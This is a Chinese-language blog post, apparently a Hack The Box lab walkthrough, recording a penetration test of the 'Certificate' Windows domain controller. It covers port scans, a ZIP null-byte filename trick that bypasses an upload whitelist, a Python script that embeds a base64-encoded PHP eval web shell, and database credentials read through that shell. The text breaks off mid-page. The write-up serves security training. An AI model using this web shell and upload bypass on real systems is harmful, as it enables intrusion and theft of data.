{"id":293,"date":"2025-06-05T13:01:31","date_gmt":"2025-06-05T05:01:31","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=293"},"modified":"2026-01-29T16:18:33","modified_gmt":"2026-01-29T08:18:33","slug":"293","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/06\/05\/293\/","title":{"rendered":"HTB\u9776\u673a Certificate \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.129.129.191<\/strong><\/code><strong>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.129.191 (10.129.129.191) 56(84) bytes of data.\n64 bytes from 10.129.129.191: icmp_seq=1 ttl=127 time=401 ms\n64 bytes from 10.129.129.191: icmp_seq=2 ttl=127 time=428 ms\n64 bytes from 10.129.129.191: icmp_seq=3 ttl=127 time=385 ms\n64 bytes from 10.129.129.191: icmp_seq=4 ttl=127 time=344 ms\n\n--- 10.129.129.191 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 343.574\/389.503\/428.212\/30.645 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u901a\u6027\u826f\u597d\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jun  1 14:19:32 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.129.191\nNmap scan report for 10.129.129.191\nHost is up (0.34s latency).\nAll 65535 scanned ports on 10.129.129.191 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Jun  1 14:20:19 2025 -- 1 IP address (1 host up) scanned in 46.72 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u5224\u65ad\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jun  1 14:22:38 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.129.191\nNmap scan report for 10.129.129.191\nHost is up (0.36s latency).\nNot shown: 65514 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n80\/tcp    open  http          Apache httpd 2.4.58 (OpenSSL\/3.1.3 PHP\/8.0.30)\n|_http-title: Did not follow redirect to http:\/\/certificate.htb\/\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.0.30\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 14:24:00Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb, Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-01T14:25:58+00:00; +8h00m01s from scanner time.\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-01T14:25:57+00:00; +8h00m01s from scanner time.\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb, Site: Default-First-Site-Name)\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n|_ssl-date: 2025-06-01T14:25:58+00:00; +8h00m01s from scanner time.\n3269\/tcp  open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-01T14:25:57+00:00; +8h00m01s from scanner time.\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49667\/tcp open  msrpc         Microsoft Windows RPC\n49685\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49686\/tcp open  msrpc         Microsoft Windows RPC\n49688\/tcp open  msrpc         Microsoft Windows RPC\n49706\/tcp open  msrpc         Microsoft Windows RPC\n60590\/tcp open  msrpc         Microsoft Windows RPC\n60605\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2019|10 (97%)\nOS CPE: cpe:\/o:microsoft:windows_server_2019 cpe:\/o:microsoft:windows_10\nAggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2025-06-01T14:25:20\n|_  start_date: N\/A\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   343.30 ms 10.10.14.1\n2   363.90 ms 10.129.129.191\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jun  1 14:25:59 2025 -- 1 IP address (1 host up) scanned in 201.47 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jun  1 14:27:43 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.129.191\nNmap scan report for 10.129.129.191\nHost is up (0.34s latency).\nNot shown: 65531 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Sun Jun  1 14:28:28 2025 -- 1 IP address (1 host up) scanned in 45.09 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Windows Server 2019<\/code>\uff0c\u4e3a\u57df\u63a7\u5236\u5668\uff0c\u8fd8\u5f00\u653e\u4e86<code>HTTP<\/code>\u670d\u52a1\uff0c\u4e3b\u57df\u540d\u4e3a<code>certificate.htb<\/code>\uff0c\u4e3b\u673a\u540d\u4e3a<code>dc01<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>DNS\u670d\u52a1\uff0853\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>dig<\/code>\u5de5\u5177\u67e5\u770b<code>DNS<\/code>\u670d\u52a1\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">dig any certificate.htb @dc01.certificate.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748760142860-48a6d126-db0d-42d2-bbf6-8365911c8a39.png\" alt=\"\" \/><\/p>\n<p>\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\uff0c\u5c1d\u8bd5\u7206\u7834\u5b50\u57df\u540d\uff0c\u65e0\u65b0\u57df\u540d\u53d1\u73b0\u3002<\/p>\n<h2>Kerberos\u670d\u52a1\uff0888\u7aef\u53e3\uff09<\/h2>\n<p>\u9996\u5148\u4f7f\u7528<code>ntpdate<\/code>\u5de5\u5177\u548c\u9776\u673a\u540c\u6b65\u65f6\u95f4\uff1a<\/p>\n<pre><code class=\"language-shell\">ntpdate -s dc01.certificate.htb<\/code><\/pre>\n<p>\u968f\u540e\u5c1d\u8bd5\u4f7f\u7528<code>kerbrute<\/code>\u5de5\u5177\u8fdb\u884c\u7528\u6237\u540d\u7206\u7834\uff0c\u4f46\u672a\u53d1\u73b0\u9664<code>Administrator<\/code>\u5916\u7684\u4efb\u4f55\u7528\u6237\u3002<\/p>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/certificate.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748768524093-d4eb7986-6a46-4b61-b214-4ccefc4d55b5.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u76ee\u6807\u7ad9\u70b9\u4e3a\u5728\u7ebf\u6559\u80b2\u5e73\u53f0\u5c55\u793a\u9875\uff0c\u4e3b\u9875\u4e0a\u5b58\u5728<code>6<\/code>\u4e2a\u94fe\u63a5\uff0c\u5206\u522b\u6307\u5411\uff1a<code>index.php<\/code>\u3001<code>about.php<\/code>\u3001<code>login.php<\/code>\u3001<code>register.php<\/code>\u3001<code>blog.php<\/code>\u548c<code>contacts.php<\/code>\u3002\u5728\u4e3b\u9875\u4e2d\u90e8\uff0c\u53d1\u73b0\u5b58\u5728\u8bfe\u7a0b\u4ecb\u7ecd\u680f\uff0c\u70b9\u51fb\u8bfe\u7a0b\u4ecb\u7ecd\u533a\u5757\u4f1a\u8df3\u8f6c\u81f3<code>course-details.php<\/code>\uff0c\u4f46\u9700\u8981\u767b\u5f55\u67e5\u770b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748769051186-687930c7-c11a-4341-86ed-942488eb74f7.png\" alt=\"\" \/><\/p>\n<p>\u8bbf\u95ee<code>blog.php<\/code>\uff0c\u53d1\u73b0\u8be5\u9875\u9762\u4e3a\u9ad8\u4eff\u8bba\u575b\u9875\u9762\uff0c\u6240\u6709\u9875\u9762\u4e0a\u7684\u5e16\u5b50\u94fe\u63a5\u5747\u4e3a\u5f53\u524d\u5730\u5740\uff0c\u8fd8\u53d1\u73b0\u7591\u4f3c\u5b58\u5728\u4e00\u4e2a<code>HTTP GET<\/code>\u53c2\u6570<code>search<\/code>\uff0c\u4f46\u65e0\u8bba\u8f93\u5165\u4ec0\u4e48\uff0c\u9875\u9762\u90fd\u6ca1\u6709\u53d8\u5316\u3002<\/p>\n<p>\u8bbf\u95ee<code>contacts.php<\/code>\uff0c\u53d1\u73b0\u4e00\u4e2a\u8868\u5355\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748770284485-6c7d66b8-efe9-4910-a4c0-5ea7a9cec35f.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u6d4b\u8bd5<code>SQLi<\/code>\u548c<code>XSS<\/code>\u6f0f\u6d1e\uff0c\u4f46\u4e0d\u5b58\u5728\uff1b\u9664\u6b64\u4e4b\u5916\u53d1\u73b0\u4e00\u4e2a\u7535\u5b50\u90ae\u7bb1<code>support@certificate.htb<\/code>\u3002<\/p>\n<p>\u76f4\u63a5\u70b9\u51fb<code>Register<\/code>\u94fe\u63a5\uff0c\u8df3\u8f6c\u81f3\u7528\u6237\u6ce8\u518c\u754c\u9762\uff0c\u6ce8\u518c\u4e00\u4e2a\u65b0\u7528\u6237\u5e76\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748998426795-74b254c9-6d12-4133-b3b3-244cccdf66fd.png\" alt=\"\" \/><\/p>\n<p>\u767b\u5f55\u540e\u8df3\u8f6c\u81f3\u4e3b\u9875\uff0c\u53d1\u73b0\u9875\u9762\u9876\u90e8\u94fe\u63a5\u680f\u65b0\u51fa\u73b0\u4e86\u4e00\u4e2a\u94fe\u63a5<code>Courses<\/code>\uff0c\u70b9\u51fb\u4e4b\u540e\u8df3\u8f6c\u5230\u4e86<code>courses.php<\/code>\u8bfe\u7a0b\u9009\u62e9\u754c\u9762\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748999926694-92b3e98e-8a5d-4cdf-a9c5-cd4297687c3d.png\" alt=\"\" \/><\/p>\n<p>\u968f\u4fbf\u70b9\u51fb\u4e00\u9879\u8bfe\u7a0b\uff0c\u8df3\u8f6c\u81f3<code>course-details.php<\/code>\u8bfe\u7a0b\u8d2d\u4e70\u9875\u9762\uff0c\u70b9\u51fb<code>Enroll<\/code>\u6309\u94ae\u5c1d\u8bd5\u9884\u8ba2\u8bfe\u7a0b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000065006-d193fcf0-3c54-4b8b-9d97-7d0df1d45198.png\" alt=\"\" \/><\/p>\n<p>\u540c\u65f6\u53d1\u73b0\u9875\u9762\u5c3e\u90e8\u51fa\u73b0\u4e86\u89c2\u770b\u8bfe\u7a0b\u89c6\u9891\u548c\u63d0\u4ea4\u4f5c\u4e1a\u7684\u6309\u94ae\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000136284-47dba6ef-0e84-48c5-9eaf-c3ba168a62b7.png\" alt=\"\" \/><\/p>\n<p>\u70b9\u51fb<code>SUBMIT<\/code>\u6309\u94ae\uff0c\u53d1\u73b0\u8df3\u8f6c\u81f3\u4e86<code>upload.php<\/code>\u6587\u4ef6\u4e0a\u4f20\u9875\u9762\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000215225-3afeeb27-0fd7-4322-8681-776491eed89d.png\" alt=\"\" \/><\/p>\n<p>\u6839\u636e\u9875\u9762\u63cf\u8ff0\uff0c\u4f5c\u4e1a\u63d0\u4ea4\u9875\u9762\u53ea\u5141\u8bb8\u4e0a\u4f20<code>.pdf<\/code>\u3001<code>.docx<\/code>\u3001<code>.pptx<\/code>\u548c<code>.xlsx<\/code>\u6587\u4ef6\uff0c\u4e5f\u53ef\u4ee5\u5c06\u4e00\u4efd\u4e3a\u4e0a\u8ff0\u56db\u79cd\u7c7b\u578b\u4e4b\u4e00\u7684\u6587\u4ef6\u6253\u5305\u5728<code>ZIP<\/code>\u538b\u7f29\u5305\u5185\u4e0a\u4f20\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>ZIP\u6587\u4ef6\u540d\u5143\u4fe1\u606f\u622a\u65ad\u7ed5\u8fc7<\/h2>\n<p>\u5728\u4e4b\u524d\u7684\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u4e86\u7528\u4e8e\u5b9e\u73b0\u4f5c\u4e1a\u63d0\u4ea4\u529f\u80fd\u7684\u6587\u4ef6\u4e0a\u4f20\u754c\u9762\uff0c\u73b0\u5728\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\u7ed5\u8fc7\u3002\u9996\u5148\u5c1d\u8bd5\u65b0\u5efa\u4e00\u4efd<code>TXT<\/code>\u6587\u4ef6\u4e0a\u4f20\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000730688-cc86b1ee-88ed-401f-972c-3e54973c3725.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000846188-505245ae-b3f8-4dbf-aee4-380fb887403c.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u63d0\u793a<code>MIME<\/code>\u7c7b\u578b\u9519\u8bef\uff0c\u5c1d\u8bd5\u66f4\u6539\u4e3a<code>application\/vnd.openxmlformats-officedocument.wordprocessingml.document<\/code>\u7c7b\u578b\uff0c\u63d0\u793a\u6587\u4ef6\u540e\u7f00\u540d\u9519\u8bef\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749001053426-db4d2686-b7e1-465c-b9b2-2840db6dee28.png\" alt=\"\" \/><\/p>\n<p>\u7ecf\u8fc7\u8fdb\u4e00\u6b65\u6d4b\u8bd5\uff0c\u53d1\u73b0\u540e\u7aef\u7a0b\u5e8f\u91c7\u7528\u4e86\u540e\u7f00\u540d\u548c<code>MIME<\/code>\u7c7b\u578b\u76f8\u5339\u914d\u7684\u53cc\u91cd\u767d\u540d\u5355\u673a\u5236\uff0c\u5982\u679c\u540e\u7f00\u540d\u975e\u6cd5\u6216\u4e0e<code>MIME<\/code>\u7c7b\u578b\u4e0d\u5bf9\u5e94\uff0c\u5219\u65e0\u6cd5\u8fdb\u884c\u4e0a\u4f20\u3002<\/p>\n<p>\u5c1d\u8bd5\u5c06\u6587\u4ef6\u540e\u7f00\u540d\u6539\u4e3a<code>.docx<\/code>\uff0c\u53d1\u73b0\u5373\u4f7f\u6587\u4ef6\u540e\u7f00\u540d\u548c<code>MIME<\/code>\u5408\u6cd5\u4e14\u76f8\u7b26\u5408\uff0c\u7a0b\u5e8f\u4e5f\u4f1a\u68c0\u6d4b\u6587\u4ef6\u4e8c\u8fdb\u5236\u683c\u5f0f\u662f\u5426\u5408\u6cd5\uff0c\u5373\u4f7f\u6dfb\u52a0<code>DOCX<\/code>\u6587\u4ef6\u5934\u4e5f\u65e0\u6cd5\u7ed5\u8fc7\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749001526652-49f172a1-b42b-485b-bd0c-00c6d4d9eb72.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u5c06\u4e00\u4e2a<code>test.txt<\/code>\u6587\u4ef6\u6539\u540d\u4e3a<code>test.docx<\/code>\u6253\u5305\u5728<code>ZIP<\/code>\u538b\u7f29\u5305\u4e2d\u4e0a\u4f20\uff0c\u53d1\u73b0\u4e0a\u4f20\u6210\u529f\uff0c\u6587\u4ef6\u88ab\u81ea\u52a8\u89e3\u538b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749001732579-edd678e1-b39c-48d1-851d-b4d6289ff57c.png\" alt=\"\" \/><\/p>\n<p>\u7ecf\u8fc7\u8fdb\u4e00\u6b65\u6d4b\u8bd5\uff0c\u53d1\u73b0\u4e0a\u4f20<code>ZIP<\/code>\u6587\u4ef6\u65f6\uff0c\u7a0b\u5e8f\u4ec5\u4f1a\u68c0\u67e5\u538b\u7f29\u5305\u5185\u6587\u4ef6\u7684\u540e\u7f00\u540d\uff0c\u4e0d\u4f1a\u68c0\u67e5\u6587\u4ef6\u4e8c\u8fdb\u5236\u683c\u5f0f\u5408\u6cd5\u6027\u3002<\/p>\n<p>\u5bf9\u4e8e\u8fd9\u79cd\u60c5\u51b5\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06<code>WebShell<\/code>\u6253\u5305\u5728\u538b\u7f29\u5305\u5185\uff0c\u4f7f\u7528<code>16<\/code>\u8fdb\u5236\u5b57\u7b26<code>\\x00<\/code>\u5bf9\u538b\u7f29\u5305\u6587\u4ef6\u540d\u5143\u4fe1\u606f\u5b57\u7b26\u4e32\u8fdb\u884c\u622a\u65ad\u7684\u65b9\u6cd5\u7ed5\u8fc7\u3002\u6bd4\u5982\uff0c<code>WebShell<\/code>\u540d\u79f0\u4e3a<code>sparkle.php<\/code>\uff0c\u90a3\u4e48\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528<code>16<\/code>\u8fdb\u5236\u622a\u65ad\u5b57\u7b26\uff0c\u53d8\u6587\u4ef6\u540d\u4e3a<code>sparkle.php\\x00.docx<\/code>\u3002\u8fd9\u6837\uff0c\u7531\u4e8e<code>ZIP<\/code>\u538b\u7f29\u5305\u5185\u6587\u4ef6\u540d\u4fe1\u606f\u5b57\u7b26\u4e32\u65e0\u9650\u5236\uff0c\u800c<code>NTFS<\/code>\u6587\u4ef6\u7cfb\u7edf\u7684\u6587\u4ef6\u540d\u6709\u5b57\u7b26\u9650\u5236\u7684\u539f\u56e0\uff0c\u7a0b\u5e8f\u4f1a\u68c0\u6d4b\u5230\u540e\u7f00\u540d<code>.docx<\/code>\uff0c\u8ba4\u4e3a\u8be5\u6587\u4ef6\u5408\u6cd5\uff0c\u968f\u5373\u8c03\u7528\u7cfb\u7edf<code>API<\/code>\u89e3\u538b\u6587\u4ef6\uff1b\u64cd\u4f5c\u7cfb\u7edf\u89e3\u538b\u6587\u4ef6\u65f6\uff0c\u8bfb\u53d6\u5230\\<code>x00<\/code>\u622a\u65ad\u5b57\u7b26\uff0c\u6587\u4ef6\u540d\u5c31\u53d8\u4e3a\u4e86<code>sparkle.php<\/code>\u3002<\/p>\n<p>\u8981\u5b9e\u73b0\u4ee5\u4e0a\u6548\u679c\uff0c\u6211\u4eec\u9700\u8981\u4f7f\u7528<code>Python<\/code>\u7684<code>zipfile<\/code>\u7c7b\u5e93\uff0c\u7ec4\u88c5<code>ZIP<\/code>\u538b\u7f29\u5305\u6587\u4ef6\u5143\u4fe1\u606f\u7684\u65b9\u6cd5\u5b9e\u73b0\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nimport base64\nimport zipfile\n\nphp_backdoor_name = f'sparkle.php\\x00.docx'\nphp_backdoor_content = '''\nR0lGODlhCjw\/cGhwCiAgJGNvZGUgPSAkX1BPU1RbImNvZGUiXTsKICBlY2hvKGV2YWwoJGNvZGUpKTsKPz4K\n'''\nphp_backdoor_content = base64.b64decode(php_backdoor_content).decode(\"utf-8\")\nmalicious_zipfile_metadata = zipfile.ZipInfo(filename=\"\", date_time=(2025, 6, 4, 10, 3, 0))\nmalicious_zipfile_metadata.filename = php_backdoor_name\n\nwith zipfile.ZipFile(\"sparkle.zip\", \"w\") as zip_f:\n    zip_f.writestr(malicious_zipfile_metadata, php_backdoor_content)<\/code><\/pre>\n<p>\u811a\u672c\u8fd0\u884c\u5b8c\u6bd5\u540e\uff0c\u5c06\u751f\u6210\u7684<code>sparkle.zip<\/code>\u6587\u4ef6\u4e0a\u4f20\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749090335285-65d0a1f8-3e22-45b0-853e-151620ac6cca.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u6309\u7167\u89c4\u5f8b\uff0c\u4f7f\u7528\u4e2d\u56fd\u8681\u5251\u5de5\u5177\u8fde\u63a5\u540e\u95e8\uff1a<code>http:\/\/certificate.htb\/static\/uploads\/371dcc2325f3edac50d1371fb8b09481\/sparkle.php<\/code>\uff08\u53c2\u6570\u540d\u4e3a<code>code<\/code>\uff09<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749090421042-eac3a770-4bc7-44eb-a8cb-e6e716b8bc10.png\" alt=\"\" \/><\/p>\n<p>\u540e\u95e8\u8fde\u63a5\u6210\u529f\uff01<\/p>\n<h2>\u7834\u89e3\u7ad9\u70b9\u7528\u6237\u54c8\u5e0c\u83b7\u5f97\u51ed\u636e<\/h2>\n<p>\u8fde\u63a5<code>WebShell<\/code>\u540e\uff0c\u53d1\u73b0\u867d\u7136\u540e\u95e8\u53ef\u4ee5\u6210\u529f\u8fd0\u884c\uff0c\u4f46\u65e0\u6cd5\u6b63\u5e38\u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\uff0c\u53ea\u80fd\u5bf9\u7cfb\u7edf\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\u8fdb\u884c\u67e5\u770b\uff0c\u4e8e\u662f\u653e\u5f03\u53cd\u5f39<code>Shell<\/code>\uff0c\u8f6c\u800c\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u3002<\/p>\n<p>\u7ecf\u8fc7\u67e5\u770b\uff0c\u5728\u9776\u673a\u7f51\u7ad9\u6839\u76ee\u5f55\u4e0b\u53d1\u73b0\u6570\u636e\u5e93\u8fde\u63a5\u914d\u7f6e\u811a\u672c\uff1a<code>C:\\xampp\\htdocs\\certificate.htb\\db.php<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749090838201-c33cc557-05c8-455b-b0c8-f7ce12c883ed.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u67e5\u770b\u5176\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n\/\/ Database connection using PDO\ntry {\n    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';\n    $db_user = 'certificate_webapp_user'; \/\/ Change to your DB username\n    $db_passwd = 'cert!f!c@teDBPWD'; \/\/ Change to your DB password\n    $options = [\n        PDO::ATTR_ERRMODE =&gt; PDO::ERRMODE_EXCEPTION,\n        PDO::ATTR_DEFAULT_FETCH_MODE =&gt; PDO::FETCH_ASSOC,\n    ];\n    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);\n} catch (PDOException $e) {\n    die('Database connection failed: ' . $e-&gt;getMessage());\n}\n?&gt;<\/code><\/pre>\n<p>\u6210\u529f\u53d1\u73b0\u6570\u636e\u5e93\u8fde\u63a5\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u6570\u636e\u5e93\u5730\u5740\uff1a<code>localhost<\/code>\uff08\u9776\u673a\u672c\u5730\uff09<\/li>\n<li>\u7528\u6237\u540d\uff1a<code>certificate_webapp_user<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>cert!f!c@teDBPWD<\/code><\/li>\n<\/ul>\n<p>\u7531\u4e8e\u672a\u83b7\u5f97\u53cd\u5f39<code>Shell<\/code>\uff0c\u76ee\u524d\u65e0\u6cd5\u76f4\u63a5\u4f7f\u7528\u547d\u4ee4\u884c\u767b\u5f55\u6570\u636e\u5e93\uff0c\u53ea\u80fd\u4f7f\u7528<code>Adminer<\/code>\u5728\u7ebf\u6570\u636e\u5e93\u7ba1\u7406\u5de5\u5177\u8fdb\u884c\u6570\u636e\u67e5\u770b\uff1a<a href=\"https:\/\/github.com\/vrana\/adminer\/releases\/download\/v5.3.0\/adminer-5.3.0.php\" target=\"_blank\"  rel=\"nofollow\" >Adminer - Database management in a single PHP file<\/a><\/p>\n<p>\u76f4\u63a5\u4e0b\u8f7d\u8be5\u6587\u4ef6\uff0c\u5e76\u4f7f\u7528\u4e2d\u56fd\u8681\u5251\u5de5\u5177\u4e0a\u4f20\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091160639-0cece627-2355-4414-a298-aabbe604a882.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u8bbf\u95ee<code>http:\/\/certificate.htb\/static\/uploads\/371dcc2325f3edac50d1371fb8b09481\/adminer.php<\/code>\uff0c\u8f93\u5165\u53d1\u73b0\u7684\u6570\u636e\u5e93\u51ed\u636e\uff0c\u70b9\u51fb\u767b\u5f55\u6309\u94ae\uff1a<\/p>\n<p><img decoding=\"async\" 